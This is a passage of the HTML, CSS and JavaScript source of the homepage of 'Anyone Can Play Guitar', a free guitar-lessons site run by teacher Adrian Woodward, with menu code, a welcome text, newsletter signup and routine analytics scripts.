.responsive-menu-pro-search-box:-ms-input-placeholder { color: #c7c7cd; } #responsive-menu-pro-container .responsive-menu-pro-search-box::-webkit-input-placeholder { color: #c7c7cd; } #responsive-menu-pro-container .responsive-menu-pro-search-box:-moz-placeholder { color: #c7c7cd; opacity: 1; } #responsive-menu-pro-container .responsive-menu-pro-search-box::-moz-placeholder { color: #c7c7cd; opacity: 1; } #responsive-menu-pro-container .responsive-menu-pro-item-link, #responsive-menu-pro-container #responsive-menu-pro-title, #responsive-menu-pro-container .responsive-menu-pro-subarrow { transition: background-color 0.5s, border-color 0.5s, color 0.5s; } #responsive-menu-pro-container #responsive-menu-pro-title { background-color: rgba(63, 65, 82, 1); color: rgba(255, 255, 255, 1); font-size: 13px; text-align: left; } #responsive-menu-pro-container #responsive-menu-pro-title a { color: rgba(255, 255, 255, 1); font-size: 13px; text-decoration: none; } #responsive-menu-pro-container #responsive-menu-pro-title a:hover { color: #ffffff; } #responsive-menu-pro-container #responsive-menu-pro-title:hover { background-color: rgba(63, 65, 82, 1); color: #ffffff; } #responsive-menu-pro-container #responsive-menu-pro-title:hover a { color: #ffffff; } #responsive-menu-pro-container #responsive-menu-pro-title #responsive-menu-pro-title-image { display: inline-block; vertical-align: middle; max-width: 100%; margin-bottom: 15px; } #responsive-menu-pro-container #responsive-menu-pro-title #responsive-menu-pro-title-image img { max-width: 100%; } #responsive-menu-pro-container #responsive-menu-pro > li.responsive-menu-pro-item:first-child > a { border-top: 1px solid rgba(77, 79, 95, 1); } #responsive-menu-pro-container #responsive-menu-pro li.responsive-menu-pro-item .responsive-menu-pro-item-link { font-size: 18px; } #responsive-menu-pro-container #responsive-menu-pro li.responsive-menu-pro-item a { line-height: 40px; border-bottom: 1px solid rgba(77, 79, 95, 1); color: rgba(255, 255, 255, 1); background-color: rgba(63, 65, 82, 1); height: 40px; } #responsive-menu-pro-container #responsive-menu-pro li.responsive-menu-pro-item a:hover { color: #ffffff; background-color: rgba(63, 65, 82, 1); border-color: rgba(77, 79, 95, 1); } #responsive-menu-pro-container #responsive-menu-pro li.responsive-menu-pro-item a:hover .responsive-menu-pro-subarrow { color: #ffffff; border-color: #ffffff; background-color: #3f3f3f; } #responsive-menu-pro-container #responsive-menu-pro li.responsive-menu-pro-item a:hover .responsive-menu-pro-subarrow.responsive-menu-pro-subarrow-active { color: #ffffff; border-color: #3f3f3f; background-color: #3f3f3f; } #responsive-menu-pro-container #responsive-menu-pro li.responsive-menu-pro-item a .responsive-menu-pro-subarrow { right: 0; height: 40px; line-height: 40px; width: 40px; color: #ffffff; border-left: 1px solid #212121; background-color: #212121; } #responsive-menu-pro-container #responsive-menu-pro li.responsive-menu-pro-item a .responsive-menu-pro-subarrow.responsive-menu-pro-subarrow-active { color: #ffffff; border-color: #212121; background-color: #212121; } #responsive-menu-pro-container #responsive-menu-pro li.responsive-menu-pro-item a .responsive-menu-pro-subarrow.responsive-menu-pro-subarrow-active:hover { color: #ffffff; border-color: #3f3f3f; background-color: #3f3f3f; } #responsive-menu-pro-container #responsive-menu-pro li.responsive-menu-pro-item a .responsive-menu-pro-subarrow:hover { color: #ffffff; border-color: #ffffff; background-color: #3f3f3f; } #responsive-menu-pro-container #responsive-menu-pro li.responsive-menu-pro-item.responsive-menu-pro-current-item > .responsive-menu-pro-item-link { background-color: rgba(63, 65, 82, 1); color: #ffffff; border-color: rgba(77, 79, 95, 1); } #responsive-menu-pro-container #responsive-menu-pro li.responsive-menu-pro-item.responsive-menu-pro-current-item > .responsive-menu-pro-item-link:hover { background-color: rgba(63, 65, 82, 1); color: #ffffff; border-color: rgba(77, 79, 95, 1); } #responsive-menu-pro-container #responsive-menu-pro ul.responsive-menu-pro-submenu li.responsive-menu-pro-item .responsive-menu-pro-item-link { font-size: 18px; } #responsive-menu-pro-container #responsive-menu-pro ul.responsive-menu-pro-submenu li.responsive-menu-pro-item a { height: 40px; line-height: 40px; border-bottom: 1px solid rgba(77, 79, 95, 1); color: rgba(255, 255, 255, 1); background-color: rgba(63, 65, 82, 1); } #responsive-menu-pro-container #responsive-menu-pro ul.responsive-menu-pro-submenu li.responsive-menu-pro-item a:hover { color: #ffffff; background-color: rgba(63, 65, 82, 1); border-color: rgba(77, 79, 95, 1); } #responsive-menu-pro-container #responsive-menu-pro ul.responsive-menu-pro-submenu li.responsive-menu-pro-item a:hover .responsive-menu-pro-subarrow { color: #ffffff; border-color: #ffffff; background-color: #3f3f3f; } #responsive-menu-pro-container #responsive-menu-pro ul.responsive-menu-pro-submenu li.responsive-menu-pro-item a:hover .responsive-menu-pro-subarrow.responsive-menu-pro-subarrow-active { color: #ffffff; border-color: #3f3f3f; background-color: #3f3f3f; } #responsive-menu-pro-container #responsive-menu-pro ul.responsive-menu-pro-submenu li.responsive-menu-pro-item a .responsive-menu-pro-subarrow { right: 0; height: 40px; line-height: 40px; width: 40px; color: #ffffff; border-left: 1px solid #212121; background-color: #212121; } #responsive-menu-pro-container #responsive-menu-pro ul.responsive-menu-pro-submenu li.responsive-menu-pro-item a .responsive-menu-pro-subarrow.responsive-menu-pro-subarrow-active { color: #ffffff; border-color: #212121; background-color: #212121; } #responsive-menu-pro-container #responsive-menu-pro ul.responsive-menu-pro-submenu li.responsive-menu-pro-item a .responsive-menu-pro-subarrow.responsive-menu-pro-subarrow-active:hover { color: #ffffff; border-color: #3f3f3f; background-color: #3f3f3f; } #responsive-menu-pro-container #responsive-menu-pro ul.responsive-menu-pro-submenu li.responsive-menu-pro-item a .responsive-menu-pro-subarrow:hover { color: #ffffff; border-color: #ffffff; background-color: #3f3f3f; } #responsive-menu-pro-container #responsive-menu-pro ul.responsive-menu-pro-submenu li.responsive-menu-pro-item.responsive-menu-pro-current-item > .responsive-menu-pro-item-link { background-color: rgba(63, 65, 82, 1); color: #ffffff; border-color: rgba(77, 79, 95, 1); } #responsive-menu-pro-container #responsive-menu-pro ul.responsive-menu-pro-submenu li.responsive-menu-pro-item.responsive-menu-pro-current-item > .responsive-menu-pro-item-link:hover { background-color: rgba(63, 65, 82, 1); color: #ffffff; border-color: rgba(77, 79, 95, 1); } } </style><script>jQuery(document).ready(function($) { var ResponsiveMenuPro = { trigger: '#responsive-menu-pro-button', animationSpeed: 500, breakpoint: 860, isOpen: false, activeClass: 'is-active', container: '#responsive-menu-pro-container', openClass: 'responsive-menu-pro-open', activeArrow: '▲', inactiveArrow: '▼', wrapper: '#responsive-menu-pro-wrapper', linkElement: '.responsive-menu-pro-item-link', subMenuTransitionTime: 200, originalHeight: '', openMenu: function() { $(this.trigger).addClass(this.activeClass); $('html').addClass(this.openClass); $('.responsive-menu-pro-button-icon-active').hide(); $('.responsive-menu-pro-button-icon-inactive').show(); this.setWrapperTranslate(); this.isOpen = true; }, closeMenu: function() { $(this.trigger).removeClass(this.activeClass); $('html').removeClass(this.openClass); $('.responsive-menu-pro-button-icon-inactive').hide(); $('.responsive-menu-pro-button-icon-active').show(); this.clearWrapperTranslate(); $("#responsive-menu-pro > li").removeAttr('style'); this.isOpen = false; }, triggerMenu: function() { this.isOpen ? this.closeMenu() : this.openMenu(); }, triggerSubArrow: function(subarrow) { var sub_menu = $(subarrow).parent().siblings('.responsive-menu-pro-submenu'); var self = this; if(sub_menu.hasClass('responsive-menu-pro-submenu-open')) { sub_menu.slideUp(self.subMenuTransitionTime, 'linear',function() { $(this).css('display', ''); }).removeClass('responsive-menu-pro-submenu-open'); $(subarrow).html(this.inactiveArrow); $(subarrow).removeClass('responsive-menu-pro-subarrow-active'); } else { sub_menu.slideDown(self.subMenuTransitionTime, 'linear').addClass('responsive-menu-pro-submenu-open'); $(subarrow).html(this.activeArrow); $(subarrow).addClass('responsive-menu-pro-subarrow-active'); } }, menuHeight: function() { return $(this.container).height(); }, menuWidth: function() { return $(this.container).width(); }, wrapperHeight: function() { return $(this.wrapper).height(); }, setWrapperTranslate: function() { switch('left') { case 'left': translate = 'translateX(' + this.menuWidth() + 'px)'; break; case 'right': translate = 'translateX(-' + this.menuWidth() + 'px)'; break; case 'top': translate = 'translateY(' + this.wrapperHeight() + 'px)'; break; case 'bottom': translate = 'translateY(-' + this.menuHeight() + 'px)'; break; } }, clearWrapperTranslate: function() { var self = this; }, init: function() { var self = this; $(this.trigger).on('click', function(e){ e.stopPropagation(); self.triggerMenu(); }); $(this.trigger).mouseup(function(){ $(self.trigger).blur(); }); $('.responsive-menu-pro-subarrow').on('click', function(e) { e.preventDefault(); e.stopPropagation(); self.triggerSubArrow(this); }); $(window).resize(function() { if($(window).width() >= self.breakpoint) { if(self.isOpen){ self.closeMenu(); } $('#responsive-menu-pro, .responsive-menu-pro-submenu').removeAttr('style'); } else { if($('.responsive-menu-pro-open').length > 0){ self.setWrapperTranslate(); } } }); } }; ResponsiveMenuPro.init(); });</script></head> <body class="home page-template-default page page-id-6 custom-header header-image full-width-content responsive-menu-pro-slide-left" itemscope itemtype="https://schema.org/WebPage"><div class="site-container"><ul class="genesis-skip-link"><li><a href="#genesis-nav-primary" class="screen-reader-shortcut"> Skip to primary navigation</a></li><li><a href="#genesis-content" class="screen-reader-shortcut"> Skip to content</a></li></ul><nav class="nav-primary" aria-label="Main" itemscope itemtype="https://schema.org/SiteNavigationElement" id="genesis-nav-primary"><div class="wrap"><ul id="menu-header-menu" class="menu genesis-nav-menu menu-primary js-superfish"><li id="menu-item-28" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-6 current_page_item menu-item-28"><a href="https://www.anyonecanplayguitar.co.uk/" aria-current="page" itemprop="url"><span itemprop="name">Home</span></a></li> <li id="menu-item-29" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-29"><a href="https://www.anyonecanplayguitar.co.uk/news/" itemprop="url"><span itemprop="name">News</span></a></li> <li id="menu-item-2873" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-2873"><a href="#" itemprop="url"><span itemprop="name">Lessons</span></a> <ul class="sub-menu"> <li id="menu-item-35" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-35"><a href="https://www.anyonecanplayguitar.co.uk/beginners/" itemprop="url"><span itemprop="name">Beginners</span></a></li> <li id="menu-item-31" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-31"><a href="https://www.anyonecanplayguitar.co.uk/blues/" itemprop="url"><span itemprop="name">Blues</span></a></li> <li id="menu-item-30" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-30"><a href="https://www.anyonecanplayguitar.co.uk/chords/" itemprop="url"><span itemprop="name">Chords</span></a></li> <li id="menu-item-37" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-37"><a href="https://www.anyonecanplayguitar.co.uk/licks/" itemprop="url"><span itemprop="name">Licks &#038; Solos</span></a></li> <li id="menu-item-38" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-38"><a href="https://www.anyonecanplayguitar.co.uk/resources/" itemprop="url"><span itemprop="name">Resources</span></a></li> </ul> </li> <li id="menu-item-1461" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1461"><a href="https://www.anyonecanplayguitar.co.uk/songs-etc/" itemprop="url"><span itemprop="name">Songs</span></a></li> <li id="menu-item-2874" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2874"><a href="https://www.anyonecanplayguitar.co.uk/category/gear/" itemprop="url"><span itemprop="name">Gear</span></a></li> <li id="menu-item-40" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-40"><a href="https://www.anyonecanplayguitar.co.uk/my-music/" itemprop="url"><span itemprop="name">Music</span></a></li> <li id="menu-item-2875" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-2875"><a href="#" itemprop="url"><span itemprop="name">About</span></a> <ul class="sub-menu"> <li id="menu-item-41" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-41"><a href="https://www.anyonecanplayguitar.co.uk/about-adrian/" itemprop="url"><span itemprop="name">About Adrian</span></a></li> <li id="menu-item-39" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-39"><a href="https://www.anyonecanplayguitar.co.uk/private-lessons/" itemprop="url"><span itemprop="name">Private lessons</span></a></li> <li id="menu-item-2877" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2877"><a href="https://www.anyonecanplayguitar.co.uk/recording/" itemprop="url"><span itemprop="name">Recording</span></a></li> </ul> </li> <li id="menu-item-2878" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-2878"><a href="#" itemprop="url"><span itemprop="name">Contact</span></a> <ul class="sub-menu"> <li id="menu-item-42" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-42"><a href="https://www.anyonecanplayguitar.co.uk/contact/" itemprop="url"><span itemprop="name">Contact Adrian</span></a></li> <li id="menu-item-2876" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2876"><a href="https://www.anyonecanplayguitar.co.uk/song-request/" itemprop="url"><span itemprop="name">Song request</span></a></li> </ul> </li> </ul></div></nav><header class="site-header" itemscope itemtype="https://schema.org/WPHeader"><div class="wrap"><div class="title-area"><p class="site-title" itemprop="headline"><a href="https://www.anyonecanplayguitar.co.uk/">Anyone Can Play Guitar</a></p><p class="site-description" itemprop="description">Online and private guitar tuition</p></div><div class="widget-area header-widget-area"><section id="search-2" class="widget widget_search"><div class="widget-wrap"><form class="search-form" itemprop="potentialAction" itemscope itemtype="https://schema.org/SearchAction" method="get" action="https://www.anyonecanplayguitar.co.uk/" role="search"><label class="search-form-label screen-reader-text" for="searchform-5cd54d03075d62.04770496">Search this website</label><input class="search-form-input" type="search" itemprop="query-input" name="s" id="searchform-5cd54d03075d62.04770496" placeholder="Search this website"><input class="search-form-submit" type="submit" value="&#xf002;"><meta itemprop="target" content="https://www.anyonecanplayguitar.co.uk/?s={s}"></form></div></section> <section id="advanced_text-2" class="widget advanced_text"><div class="widget-wrap"><div class='AdvancedText'><div class="social"> <a href="https://www.anyonecanplayguitar.co.uk/please-support-this-site"><div class="donate">Donate</div></a> <a href="https://www.facebook.com/anyonecanplayguitar.co.uk" target="_blank"><div class="fbbadge"><i class="fa fa-facebook" aria-hidden="true"></i></div></a> <a href="https://twitter.com/acpgtr" target="_blank"><div class="twitterbadge"><i class="fa fa-twitter" aria-hidden="true"></i></div></a> <a href="https://www.instagram.com/acpgtr/" target="_blank"><div class="instabadge"><i class="fa fa-instagram" aria-hidden="true"></i></div></a> <a href="https://www.youtube.com/c/anyonecanplayguitarcouk" target="_blank"><div class="youtubebadge"><i class="fa fa-youtube-play" aria-hidden="true"></i></div></a> </div></div></div></section> </div></div></header><div class="after-header-home" style="background: linear-gradient(rgba(0, 0, 0, 0.0), rgba(0, 0, 0, 0.0)), url('https://www.anyonecanplayguitar.co.uk/wp-content/uploads/2017/02/acpg-pics-14.jpg'); background-size: cover; background-repeat: no-repeat; background-position: center 40%;"><div class="after-header-home-inner"></div></div> <div class="site-inner"><div class="content-sidebar-wrap"><main class="content" id="genesis-content"><article class="post-6 page type-page status-publish entry" itemscope itemtype="https://schema.org/CreativeWork"><div class="entry-content" itemprop="text"><div class="homefeatured"><div class="gca-column one-fourth first"><i class="fa fa-desktop"></i></p> <h3><a href="https://www.anyonecanplayguitar.co.uk/beginners/">Beginners</a></h3> <p>Let me guide you through the early stages of learning to play the guitar.</p> <h5><a href="https://www.anyonecanplayguitar.co.uk/beginners/">→</a></h5></div> <div class="gca-column one-fourth"><i class="fa fa-user-o"></i></p> <h3><a href="https://www.anyonecanplayguitar.co.uk/private-lessons/">Private lessons</a></h3> <p>Learn to play with one-to-one lessons in the London area or via Skype/FaceTime.</p> <h5><a href="https://www.anyonecanplayguitar.co.uk/private-lessons/">→</a></h5></div> <div class="gca-column one-fourth"><i class="fa fa-file-text-o"></i></p> <h3><a href="https://www.anyonecanplayguitar.co.uk/resources/">Resources</a></h3> <p>Tons of useful downloadable resources: chords, scales, arpeggios, tabs etc.</p> <h5><a href="https://www.anyonecanplayguitar.co.uk/resources/">→ </a></h5></div> <div class="gca-column one-fourth"><i class="fa fa-music"></i></p> <h3><a href="https://www.anyonecanplayguitar.co.uk/songs-etc/">Songs</a></h3> <p>Plenty of licks, solos and songs to learn: easy, hard, classics and obscurities.</p> <h5><a href="https://www.anyonecanplayguitar.co.uk/songs-etc/">→</a></h5></div> </div> <div class="gca-utility vertical-spacer"></div> <div class="gca-column two-thirds first">Welcome to my website, a collection of over 150 top-quality, completely free guitar lessons. My name is Adrian Woodward and I&#8217;ve been playing guitar for over 30 years. As a teacher I have nearly 20 years experience, having helped thousands of guitarists to reach their goals. This site is something I&#8217;ve put together in my spare time in the hope of helping and inspiring as many guitarists as possible. I hope there will be something here for everybody, no matter what your level of experience or what kind of music you&#8217;re into.</p> <p>My <a href="https://www.anyonecanplayguitar.co.uk/beginners/">beginners</a> section will get you up and running and covers everything from choosing a guitar to playing some cool, easy songs. There&#8217;s a <a href="https://www.anyonecanplayguitar.co.uk/songs-etc/">songs</a> section which contains some of the most accurate and reliable song tutorials anywhere on the internet. There are plenty of awesome <a href="https://www.anyonecanplayguitar.co.uk/licks/">licks.</a> And also a super-useful <a href="https://www.anyonecanplayguitar.co.uk/resources/">resources</a> section that contains a load of reference materials of the kind that I give to my private students during lessons.</p> <p><a href="https://www.anyonecanplayguitar.co.uk/please-support-this-site/">Please consider donating</a> if you enjoy and have benefitted from the lessons and information on this site. These lessons are extremely time-consuming to put together, and I&#8217;m not currently making any profit from this site. All contributions are massively appreciated and enable me to keep on doing what I&#8217;m doing.</p> <h3>Check out the latest free lesson:</h3> <p><a href="https://www.anyonecanplayguitar.co.uk/sheela-na-gig/">Sheela-Na-Gig</a> A great early track from P J Harvey.</div> <div class="gca-column one-third"><img class="alignnone wp-image-2365" src="https://www.anyonecanplayguitar.co.uk/wp-content/uploads/2016/12/Adrian_Front_Page-1024x665.jpg" alt="" width="545" height="354" srcset="https://www.anyonecanplayguitar.co.uk/wp-content/uploads/2016/12/Adrian_Front_Page-1024x665.jpg 1024w, https://www.anyonecanplayguitar.co.uk/wp-content/uploads/2016/12/Adrian_Front_Page-300x195.jpg 300w, https://www.anyonecanplayguitar.co.uk/wp-content/uploads/2016/12/Adrian_Front_Page-768x498.jpg 768w, https://www.anyonecanplayguitar.co.uk/wp-content/uploads/2016/12/Adrian_Front_Page.jpg 1570w" sizes="(max-width: 545px) 100vw, 545px" /></p> <div class="support-home"><a href="https://open.spotify.com/album/1TIlcnWkXt8oCErqbU9po1?si=kUxbAkpmTTCV1G2RIRAegg" target="_blank" rel="noopener noreferrer"><img class="alignleft wp-image-2602" src="https://www.anyonecanplayguitar.co.uk/wp-content/uploads/2018/03/inky_depths_hyfry_1400px-1024x1024.jpg" alt="" width="250" height="250" srcset="https://www.anyonecanplayguitar.co.uk/wp-content/uploads/2018/03/inky_depths_hyfry_1400px-1024x1024.jpg 1024w, https://www.anyonecanplayguitar.co.uk/wp-content/uploads/2018/03/inky_depths_hyfry_1400px-150x150.jpg 150w, https://www.anyonecanplayguitar.co.uk/wp-content/uploads/2018/03/inky_depths_hyfry_1400px-300x300.jpg 300w, https://www.anyonecanplayguitar.co.uk/wp-content/uploads/2018/03/inky_depths_hyfry_1400px-768x768.jpg 768w, https://www.anyonecanplayguitar.co.uk/wp-content/uploads/2018/03/inky_depths_hyfry_1400px.jpg 1400w" sizes="(max-width: 250px) 100vw, 250px" /></a><a href="https://open.spotify.com/album/1TIlcnWkXt8oCErqbU9po1?si=kUxbAkpmTTCV1G2RIRAegg">Check out my new album here</a>.</div></div> <div class="gca-utility vertical-spacer"></div> </div></article></main></div></div><div class="footerwidgetheader-container"><aside class="widget-area"><h2 class="genesis-sidebar-title screen-reader-text">Footer Widget Header</h2><section id="advanced_text-6" class="widget advanced_text"><div class="widget-wrap"><div class='AdvancedText'><script>(function() { if (!window.mc4wp) { window.mc4wp = { listeners: [], forms : { on: function (event, callback) { window.mc4wp.listeners.push({ event : event, callback: callback }); } } } } })(); </script><!-- Mailchimp for WordPress v4.5.0 - https://wordpress.org/plugins/mailchimp-for-wp/ --><form id="mc4wp-form-1" class="mc4wp-form mc4wp-form-767" method="post" data-id="767" data-name="Signup" ><div class="mc4wp-form-fields"><div class="footerform"><strong>Sign up for my monthly newsletter:</strong> <label>First Name: </label><input type="text" name="FNAME" required><label>Last Name: </label><input type="text" name="LNAME" required><label>Email address: </label><input type="email" name="EMAIL" required /><input type="submit" value="Sign up" /></div> </div><label style="display: none !important;">Leave this field empty if you're human: <input type="text" name="_mc4wp_honeypot" value="" tabindex="-1" autocomplete="off" /></label><input type="hidden" name="_mc4wp_timestamp" value="1557482755" /><input type="hidden" name="_mc4wp_form_id" value="767" /><input type="hidden" name="_mc4wp_form_element_id" value="mc4wp-form-1" /><div class="mc4wp-response"></div></form><!-- / Mailchimp for WordPress Plugin --></div></div></section> </aside></div><footer class="site-footer" itemscope itemtype="https://schema.org/WPFooter"><div class="wrap"><nav class="footer-menu"><ul id="menu-footer-menu" class="menu genesis-nav-menu menu-footer gfb-menu-footer js-superfish"><li id="menu-item-631" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-6 current_page_item menu-item-631"><a href="https://www.anyonecanplayguitar.co.uk/" aria-current="page" itemprop="url">Home</a></li> <li id="menu-item-632" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-632"><a href="https://www.anyonecanplayguitar.co.uk/news/" itemprop="url">News</a></li> <li id="menu-item-633" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-633"><a href="https://www.anyonecanplayguitar.co.uk/beginners/" itemprop="url">Beginners</a></li> <li id="menu-item-1462" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1462"><a href="https://www.anyonecanplayguitar.co.uk/songs-etc/" itemprop="url">Songs</a></li> <li id="menu-item-637" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-637"><a href="https://www.anyonecanplayguitar.co.uk/licks/" itemprop="url">Licks &#038; Solos</a></li> <li id="menu-item-634" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-634"><a href="https://www.anyonecanplayguitar.co.uk/chords/" itemprop="url">Chords</a></li> <li id="menu-item-635" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-635"><a href="https://www.anyonecanplayguitar.co.uk/blues/" itemprop="url">Blues</a></li> <li id="menu-item-638" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-638"><a href="https://www.anyonecanplayguitar.co.uk/resources/" itemprop="url">Resources</a></li> <li id="menu-item-639" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-639"><a href="https://www.anyonecanplayguitar.co.uk/private-lessons/" itemprop="url">Private lessons</a></li> <li id="menu-item-640" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-640"><a href="https://www.anyonecanplayguitar.co.uk/my-music/" itemprop="url">My music</a></li> <li id="menu-item-641" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-641"><a href="https://www.anyonecanplayguitar.co.uk/about-adrian/" itemprop="url">About Adrian</a></li> <li id="menu-item-642" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-642"><a href="https://www.anyonecanplayguitar.co.uk/contact/" itemprop="url">Contact</a></li> <li id="menu-item-2892" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2892"><a href="https://www.anyonecanplayguitar.co.uk/song-request/" itemprop="url">Song request</a></li> <li id="menu-item-2891" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2891"><a href="https://www.anyonecanplayguitar.co.uk/recording/" itemprop="url">Recording</a></li> <li id="menu-item-808" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-808"><a href="https://www.anyonecanplayguitar.co.uk/privacy-and-cookies/" itemprop="url">Privacy and Cookies</a></li> <li id="menu-item-807" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-807"><a href="https://www.anyonecanplayguitar.co.uk/website-terms-and-conditions/" itemprop="url">Terms and conditions</a></li> </ul></nav><p>&copy; 2019 <a title="Anyone Can Play Guitar" href="https://www.anyonecanplayguitar.co.uk">Anyone Can Play Guitar</a>. Adrian Woodward, private guitar tuition in North London.</p></div></footer></div> <!-- Start of StatCounter Code --> <script> <!-- var sc_project=11239320; var sc_security="a7e28800"; var sc_invisible=1; var scJsHost = (("https:" == document.location.protocol) ? "https://secure." : "http://www."); //--> </script> <script type="text/javascript" src="https://secure.statcounter.com/counter/counter.js" async></script> <noscript><div class="statcounter"><a title="web analytics" href="https://statcounter.com/"><img class="statcounter" src="https://c.statcounter.com/11239320/0/a7e28800/1/" alt="web analytics" /></a></div></noscript> <!-- End of StatCounter Code --> <script> jQuery(document).ready(function () { jQuery.post('https://www.anyonecanplayguitar.co.uk?ga_action=googleanalytics_get_script', {action: 'googleanalytics_get_script'}, function(response) { var s = document.createElement("script"); s.type = "text/javascript"; s.innerHTML = response; jQuery("head").append(s); }); }); </script><script>(function() {function addEventListener(element,event,handler) { if(element.addEventListener) { element.addEventListener(event,handler, false); } else if(element.attachEvent){ element.attachEvent('on'+event,handler); } }function maybePrefixUrlField() { if(this.value.trim() !== '' && this.value.indexOf('http') !== 0) { this.value = "http://" + this.value; } } var urlFields = document.querySelectorAll('.mc4wp-form input[type="url"]'); if( urlFields && urlFields.length > 0 ) { for( var j=0; j < urlFields.length; j++ ) { addEventListener(urlFields[j],'blur',maybePrefixUrlField); } }/* test if browser supports date fields */ var testInput = document.createElement('input'); testInput.setAttribute('type', 'date'); if( testInput.type !== 'date') { /* add placeholder & pattern to all date fields */ var dateFields = document.querySelectorAll('.mc4wp-form input[type="date"]'); for(var i=0; i<dateFields.length; i++) { if(!dateFields[i].placeholder) { dateFields[i].placeholder = 'YYYY-MM-DD'; } if(!dateFields[i].pattern) { dateFields[i].pattern = '[0-9]{4}-(0[1-9]|1[012])-(0[1-9]|1[0-9]|2[0-9]|3[01])'; } } } })();</script> <button id="responsive-menu-pro-button" class="responsive-menu-pro-button responsive-menu-pro-spin " type="button" aria-label="Menu"> <span class="responsive-menu-pro-box"> <span class="responsive-menu-pro-inner"></span> </span> <span class="responsive-menu-pro-label responsive-menu-pro-label-bottom"> <span class="responsive-menu-pro-button-text">Menu</span> </span> </button> <div id="responsive-menu-pro-container" class="slide-left"> <div id="responsive-menu-pro-wrapper"> <ul id="responsive-menu-pro" class=""><li id="responsive-menu-pro-item-781" class=" menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-6 current_page_item responsive-menu-pro-item responsive-menu-pro-current-item responsive-menu-pro-desktop-menu-col-auto"><a class="responsive-menu-pro-item-link" href="https://www.anyonecanplayguitar.co.uk/" itemprop="url">Home</a></li><li id="responsive-menu-pro-item-782" class=" menu-item menu-item-type-post_type menu-item-object-page responsive-menu-pro-item responsive-menu-pro-desktop-menu-col-auto"><a class="responsive-menu-pro-item-link" href="https://www.anyonecanplayguitar.co.uk/news/" itemprop="url">News</a></li><li id="responsive-menu-pro-item-2885" class=" menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children responsive-menu-pro-item responsive-menu-pro-item-has-children"><a class="responsive-menu-pro-item-link" href="#" itemprop="url">Lessons<div class="responsive-menu-pro-subarrow">▼</div></a><ul data-depth='2' class='responsive-menu-pro-submenu responsive-menu-pro-submenu-depth-1'><li id="responsive-menu-pro-item-783" class=" menu-item menu-item-type-post_type menu-item-object-page responsive-menu-pro-item"><a class="responsive-menu-pro-item-link" href="https://www.anyonecanplayguitar.co.uk/beginners/" itemprop="url">Beginners</a></li><li id="responsive-menu-pro-item-785" class=" menu-item menu-item-type-post_type menu-item-object-page responsive-menu-pro-item"><a class="responsive-menu-pro-item-link" href="https://www.anyonecanplayguitar.co.uk/blues/" itemprop="url">Blues</a></li><li id="responsive-menu-pro-item-784" class=" menu-item menu-item-type-post_type menu-item-object-page responsive-menu-pro-item"><a class="responsive-menu-pro-item-link" href="https://www.anyonecanplayguitar.co.uk/chords/" itemprop="url">Chords</a></li><li id="responsive-menu-pro-item-787" class=" menu-item menu-item-type-post_type menu-item-object-page responsive-menu-pro-item"><a class="responsive-menu-pro-item-link" href="https://www.anyonecanplayguitar.co.uk/licks/" itemprop="url">Licks &#038; Solos</a></li><li id="responsive-menu-pro-item-788" class=" menu-item menu-item-type-post_type menu-item-object-page responsive-menu-pro-item"><a class="responsive-menu-pro-item-link" href="https://www.anyonecanplayguitar.co.uk/resources/" itemprop="url">Resources</a></li></ul></li><li id="responsive-menu-pro-item-1463" class=" menu-item menu-item-type-post_type menu-item-object-page responsive-menu-pro-item responsive-menu-pro-desktop-menu-col-auto"><a class="responsive-menu-pro-item-link" href="https://www.anyonecanplayguitar.co.uk/songs-etc/" itemprop="url">Songs</a></li><li id="responsive-menu-pro-item-790" class=" menu-item menu-item-type-post_type menu-item-object-page responsive-menu-pro-item responsive-menu-pro-desktop-menu-col-auto"><a class="responsive-menu-pro-item-link" href="https://www.anyonecanplayguitar.co.uk/my-music/" itemprop="url">Music</a></li><li id="responsive-menu-pro-item-2886" class=" menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children responsive-menu-pro-item responsive-menu-pro-item-has-children"><a class="responsive-menu-pro-item-link" href="#" itemprop="url">About<div class="responsive-menu-pro-subarrow">▼</div></a><ul data-depth='2' class='responsive-menu-pro-submenu responsive-menu-pro-submenu-depth-1'><li id="responsive-menu-pro-item-791" class=" menu-item menu-item-type-post_type menu-item-object-page responsive-menu-pro-item"><a class="responsive-menu-pro-item-link" href="https://www.anyonecanplayguitar.co.uk/about-adrian/" itemprop="url">About Adrian</a></li><li id="responsive-menu-pro-item-789" class=" menu-item menu-item-type-post_type menu-item-object-page responsive-menu-pro-item"><a class="responsive-menu-pro-item-link" href="https://www.anyonecanplayguitar.co.uk/private-lessons/" itemprop="url">Private lessons</a></li><li id="responsive-menu-pro-item-2888" class=" menu-item menu-item-type-post_type 